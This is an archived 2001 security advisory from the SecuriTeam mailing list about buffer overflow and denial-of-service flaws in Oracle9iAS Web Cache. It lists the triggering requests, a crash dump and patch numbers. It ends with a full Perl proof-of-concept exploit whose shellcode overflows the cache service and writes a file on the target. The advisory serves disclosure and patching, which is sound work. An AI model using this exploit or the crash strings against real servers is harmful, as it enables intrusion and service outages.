[EXPL] Oracle9iAS Web Cache Multiple DoS and Buffer Overflow

From: support@securiteam.com
Date: 10/20/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Oracle9iAS Web Cache Multiple DoS and Buffer Overflow
Message-Id: <20011020214551.5E3B1138C9@mail.der-keiler.de>
Date: Sat, 20 Oct 2001 23:45:51 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Oracle9iAS Web Cache Multiple DoS and Buffer Overflow
------------------------------------------------------------------------

SUMMARY

Oracle9iAS Release 2.0.0.1.0 (previous releases may also be affected),
contain a URL driven buffer overrun condition that can cause process
exiting, process hanging or injection of malicious code.

DETAILS

Vulnerable systems:
Oracle9iAS Web Cache version 2.0.0.1.0

A simple URL driven denial of service or buffer overflow condition occurs
when a very long text string is sent to the web service. This occurs on
all four web services that the Oracle9iAS Web Cache software provides. The
four services are by default run on:
Port 1100 = Incoming web cache proxy.
Port 4000 = Administrative interface.
Port 4001 = Web XML invalidation port.
Port 4002 = Statistics port.

Buffer overflow condition:
When sending a request containing / + 'A' x 3095 + 'N' x 4, the process
terminates with the with the following state dump:

  <....snip>
  State Dump for Thread Id 0x104

  eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
  esi=01baac86 edi=0040deb6
  eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
  cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
  efl=00000216
  <snip....>

Denial of service:
Upon sending a string longer then 3570 characters, the process simply
exists without stack dump:
  'GET /<3571 x A> HTTP/1.0'

The following three denial of service attacks result in the process
hanging and the CPU usage of 100%. A reboot is required in order to
terminate the hanging processes:

 - When sending a string containing approximately 3094 characters.
 - When sending more approximately 4000 characters in the HTTP header.
User-Agent is one of the verified headers where this condition exists.
    'GET / HTTP/1.0'
    'User-Agent: <4000 x A>'

 - Sending the following request (this only affects the webcache admin
interface):
    'GET /. HTTP/1.0'

Workaround:
Download patch from Oracle's support website,
 <http://metalink.oracle.com> http://metalink.oracle.com

Windows NT or Windows 2000:
Patch number 2044682

SUN Sparc Solaris:
Patch number 2042106

HP-UX:
Patch number 2043908

Linux:
Patch number 2043924

Compaq Tru64 Unix:
Patch number 2043921

IBM AIX:
Patch number 2043917

Exploit:
####################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
####################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
           print "Usage: $0 <host>\n";
           print "Example: $0 127.0.0.1\n";
           exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit =
"\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit .
"\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit .
"\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit .
"\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit .
"\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) .
"\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

ADDITIONAL INFORMATION

The information has been provided by <mailto:george.hedfors@defcom.com>
George Hedfors and <mailto:andreas.junestam@defcom.com> Andreas Junestam.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages